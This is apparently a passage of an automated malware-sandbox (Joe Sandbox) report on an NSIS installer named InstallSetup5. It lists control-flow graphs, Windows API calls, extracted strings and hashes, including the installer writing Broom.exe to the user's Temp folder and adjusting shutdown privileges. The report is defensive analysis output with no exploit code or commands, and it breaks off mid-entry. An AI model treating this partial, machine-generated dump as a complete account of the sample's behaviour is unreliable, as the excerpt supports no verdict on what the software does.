67 403a7d-403a8d call 403b4f OleUninitialize 45->67 54 403771-403776 47->54 55 40378c-4037c6 47->55 52 403727-40372a 48->52 53 40372c 48->53 52->47 52->53 53->47 54->55 56 403778-403780 54->56 58 4037c8-4037cc 55->58 59 4037ce-4037d0 55->59 62 403782-403785 56->62 63 403787 56->63 58->59 65 4037f2-4037ff call 406557 58->65 59->42 61->32 62->55 62->63 63->55 64->45 64->67 65->37 70 4038a2-4038ad call 405e53 66->70 71 403935-40393c call 403c29 66->71 77 403ab3-403ab9 67->77 78 403a8f-403a9f call 405bb7 ExitProcess 67->78 82 4038fb-403905 70->82 83 4038af-4038e4 70->83 80 403941-403945 71->80 84 403b37-403b3f 77->84 85 403abb-403ad1 GetCurrentProcess OpenProcessToken 77->85 80->67 88 403907-403915 call 405f2e 82->88 89 40394a-403970 call 405b22 lstrlenW call 406557 82->89 93 4038e6-4038ea 83->93 90 403b41 84->90 91 403b45-403b49 ExitProcess 84->91 86 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 85->86 87 403b07-403b15 call 40694b 85->87 86->87 104 403b23-403b2e ExitWindowsEx 87->104 105 403b17-403b21 87->105 88->67 106 40391b-403931 call 406557 * 2 88->106 110 403981-403999 89->110 111 403972-40397c call 406557 89->111 90->91 95 4038f3-4038f7 93->95 96 4038ec-4038f1 93->96 95->93 100 4038f9 95->100 96->95 96->100 100->82 104->84 108 403b30-403b32 call 40140b 104->108 105->104 105->108 106->71 108->84 116 40399e-4039a2 110->116 111->110 118 4039a7-4039d1 wsprintfW call 406594 116->118 122 4039d3-4039d8 call 405aab 118->122 123 4039da call 405b05 118->123 126 4039df-4039e1 122->126 123->126 128 4039e3-4039ed GetFileAttributesW 126->128 129 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 126->129 130 403a0e-403a19 128->130 131 4039ef-4039f8 DeleteFileW 128->131 137 403a7b 129->137 138 403a3e-403a5f call 406317 call 406594 call 405b3a 129->138 130->116 134 403a1b 130->134 131->130 133 4039fa-403a0c call 405c63 131->133 133->118 133->130 134->67 137->67 146 403a61-403a6b 138->146 147 403aa5-403ab1 CloseHandle 138->147 146->137 148 403a6d-403a75 call 4068b4 146->148 147->137 148->118 148->137
                                                                                                                                                              APIs
                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 00403555
                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                                                                                                                              • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403670
                                                                                                                                                              • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                                                                                                                              • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                                                                                                                              • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403832
                                                                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040384E
                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                                                                                                                              • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                                                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                                                                                                                • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                              • wsprintfW.USER32 ref: 004039B1
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                                                                                                                              • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                                                                                                                • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                                                                                              • CopyFileW.KERNEL32(00442800,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                                                                                                                • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                                                                                                • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                                                                                                • Part of subcall function 004068B4: FindFirstFileW.KERNEL32(?,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                                                • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                                              • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403B49
                                                                                                                                                                • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                                              • API String ID: 1813718867-164033496
                                                                                                                                                              • Opcode ID: 2e41678f2876b0813857cd97e76b44bbe4b3eeb6df5acb682b8643e6af53fd03
                                                                                                                                                              • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                                                                                                                              • Opcode Fuzzy Hash: 2e41678f2876b0813857cd97e76b44bbe4b3eeb6df5acb682b8643e6af53fd03
                                                                                                                                                              • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 151 403c29-403c41 call 40694b 154 403c43-403c4e GetUserDefaultUILanguage call 40649e 151->154 155 403c55-403c8c call 406425 151->155 159 403c53 154->159 160 403ca4-403caa lstrcatW 155->160 161 403c8e-403c9f call 406425 155->161 162 403caf-403cd8 call 403eff call 405f2e 159->162 160->162 161->160 168 403d6a-403d72 call 405f2e 162->168 169 403cde-403ce3 162->169 175 403d80-403da5 LoadImageW 168->175 176 403d74-403d7b call 406594 168->176 169->168 170 403ce9-403d11 call 406425 169->170 170->168 180 403d13-403d17 170->180 178 403e26-403e2e call 40140b 175->178 179 403da7-403dd7 RegisterClassW 175->179 176->175 193 403e30-403e33 178->193 194 403e38-403e43 call 403eff 178->194 181 403ef5 179->181 182 403ddd-403e21 SystemParametersInfoW CreateWindowExW 179->182 184 403d29-403d35 lstrlenW 180->184 185 403d19-403d26 call 405e53 180->185 187 403ef7-403efe 181->187 182->178 188 403d37-403d45 lstrcmpiW 184->188 189 403d5d-403d65 call 405e26 call 406557 184->189 185->184 188->189 192 403d47-403d51 GetFileAttributesW 188->192 189->168 196 403d53-403d55 192->196 197 403d57-403d58 call 405e72 192->197 193->187 203 403e49-403e63 ShowWindow call 4068db 194->203 204 403ecc-403ed4 call 4056af 194->204 196->189 196->197 197->189 211 403e65-403e6a call 4068db 203->211 212 403e6f-403e81 GetClassInfoW 203->212 209 403ed6-403edc 204->209 210 403eee-403ef0 call 40140b 204->210 209->193 215 403ee2-403ee9 call 40140b 209->215 210->181 211->212 213 403e83-403e93 GetClassInfoW RegisterClassW 212->213 214 403e99-403eca DialogBoxParamW call 40140b call 403b79 212->214 213->214 214->187 215->193
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                                                • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403C43
                                                                                                                                                                • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                                              • lstrcatW.KERNEL32(1033,0042CA68), ref: 00403CAA
                                                                                                                                                              • lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420), ref: 00403D2A
                                                                                                                                                              • lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                                                                                              • GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
                                                                                                                                                              • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                                                                                              • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                              • API String ID: 606308-2896555866
                                                                                                                                                              • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                                              • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                                                                                                                              • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                                              • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 224 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 227 4030d2-4030d7 224->227 228 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 224->228 229 4032b2-4032b6 227->229 236 403110 228->236 237 4031f5-403203 call 40301e 228->237 239 403115-40312c 236->239 243 403205-403208 237->243 244 403258-40325d 237->244 241 403130-403139 call 4034d4 239->241 242 40312e 239->242 250 40325f-403267 call 40301e 241->250 251 40313f-403146 241->251 242->241 246 40320a-403222 call 4034ea call 4034d4 243->246 247 40322c-403256 GlobalAlloc call 4034ea call 4032b9 243->247 244->229 246->244 272 403224-40322a 246->272 247->244 271 403269-40327a 247->271 250->244 255 4031c2-4031c6 251->255 256 403148-40315c call 406002 251->256 260 4031d0-4031d6 255->260 261 4031c8-4031cf call 40301e 255->261 256->260 275 40315e-403165 256->275 266 4031e5-4031ed 260->266 267 4031d8-4031e2 call 406a38 260->267 261->260 266->239 270 4031f3 266->270 267->266 270->237 276 403282-403287 271->276 277 40327c 271->277 272->244 272->247 275->260 279 403167-40316e 275->279 281 403288-40328e 276->281 277->276 279->260 280 403170-403177 279->280 280->260 282 403179-403180 280->282 281->281 283 403290-4032ab SetFilePointer call 406002 281->283 282->260 284 403182-4031a2 282->284 287 4032b0 283->287 284->244 286 4031a8-4031ac 284->286 288 4031b4-4031bc 286->288 289 4031ae-4031b2 286->289 287->229 288->260 290 4031be-4031c0 288->290 289->270 289->288 290->260
                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030AF
                                                                                                                                                                • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
                                                                                                                                                                • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00442800,00442800,80000000,00000003), ref: 004030FB
                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                                                                                              Strings
                                                                                                                                                              • Error launching installer, xrefs: 004030D2
                                                                                                                                                              • Null, xrefs: 00403179
                                                                                                                                                              • soft, xrefs: 00403170
                                                                                                                                                              • Inst, xrefs: 00403167
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 004030DD, 004030E2, 004030E8
                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                              • API String ID: 2803837635-2013321303
                                                                                                                                                              • Opcode ID: 18071a83ec6fb142dc69507f2a99f9a57da6e94b99e66eca773901507235fdac
                                                                                                                                                              • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                                                                                                                              • Opcode Fuzzy Hash: 18071a83ec6fb142dc69507f2a99f9a57da6e94b99e66eca773901507235fdac
                                                                                                                                                              • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 291 4032b9-4032d0 292 4032d2 291->292 293 4032d9-4032e2 291->293 292->293 294 4032e4 293->294 295 4032eb-4032f0 293->295 294->295 296 403300-40330d call 4034d4 295->296 297 4032f2-4032fb call 4034ea 295->297 301 4034c2 296->301 302 403313-403317 296->302 297->296 303 4034c4-4034c5 301->303 304 40346d-40346f 302->304 305 40331d-403366 GetTickCount 302->305 308 4034cd-4034d1 303->308 306 403471-403474 304->306 307 4034af-4034b2 304->307 309 4034ca 305->309 310 40336c-403374 305->310 306->309 311 403476 306->311 314 4034b4 307->314 315 4034b7-4034c0 call 4034d4 307->315 309->308 312 403376 310->312 313 403379-403387 call 4034d4 310->313 317 403479-40347f 311->317 312->313 313->301 325 40338d-403396 313->325 314->315 315->301 323 4034c7 315->323 320 403481 317->320 321 403483-403491 call 4034d4 317->321 320->321 321->301 328 403493-40349f call 4060f9 321->328 323->309 327 40339c-4033bc call 406aa6 325->327 333 4033c2-4033d5 GetTickCount 327->333 334 403465-403467 327->334 335 4034a1-4034ab 328->335 336 403469-40346b 328->336 337 403420-403422 333->337 338 4033d7-4033df 333->338 334->303 335->317 343 4034ad 335->343 336->303 341 403424-403428 337->341 342 403459-40345d 337->342 339 4033e1-4033e5 338->339 340 4033e7-40341d MulDiv wsprintfW call 4055dc 338->340 339->337 339->340 340->337 345 40342a-403431 call 4060f9 341->345 346 40343f-40344a 341->346 342->310 347 403463 342->347 343->309 351 403436-403438 345->351 350 40344d-403451 346->350 347->309 350->327 352 403457 350->352 351->336 353 40343a-40343d 351->353 352->309 353->350
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountTick$wsprintf
                                                                                                                                                              • String ID: *B$ A$ A$... %d%%
                                                                                                                                                              • API String ID: 551687249-3485722521
                                                                                                                                                              • Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                                                                                              • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                                                                                                                              • Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                                                                                              • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 354 401774-401799 call 402dab call 405e9d 359 4017a3-4017b5 call 406557 call 405e26 lstrcatW 354->359 360 40179b-4017a1 call 406557 354->360 365 4017ba-4017bb call 406805 359->365 360->365 369 4017c0-4017c4 365->369 370 4017c6-4017d0 call 4068b4 369->370 371 4017f7-4017fa 369->371 379 4017e2-4017f4 370->379 380 4017d2-4017e0 CompareFileTime 370->380 373 401802-40181e call 406047 371->373 374 4017fc-4017fd call 406022 371->374 381 401820-401823 373->381 382 401892-4018bb call 4055dc call 4032b9 373->382 374->373 379->371 380->379 383 401874-40187e call 4055dc 381->383 384 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 381->384 396 4018c3-4018cf SetFileTime 382->396 397 4018bd-4018c1 382->397 394 401887-40188d 383->394 384->369 416 401869-40186a 384->416 398 402c38 394->398 400 4018d5-4018e0 FindCloseChangeNotification 396->400 397->396 397->400 404 402c3a-402c3e 398->404 401 4018e6-4018e9 400->401 402 402c2f-402c32 400->402 405 4018eb-4018fc call 406594 lstrcatW 401->405 406 4018fe-401901 call 406594 401->406 402->398 412 401906-4023a7 call 405bb7 405->412 406->412 412->402 412->404 416->394 418 40186c-40186d 416->418 418->383
                                                                                                                                                              APIs
                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\Broom.exe,C:\Users\user\AppData\Local\Temp\Broom.exe,00000000,00000000,C:\Users\user\AppData\Local\Temp\Broom.exe,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017DA
                                                                                                                                                                • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                                                                                                • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                                                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
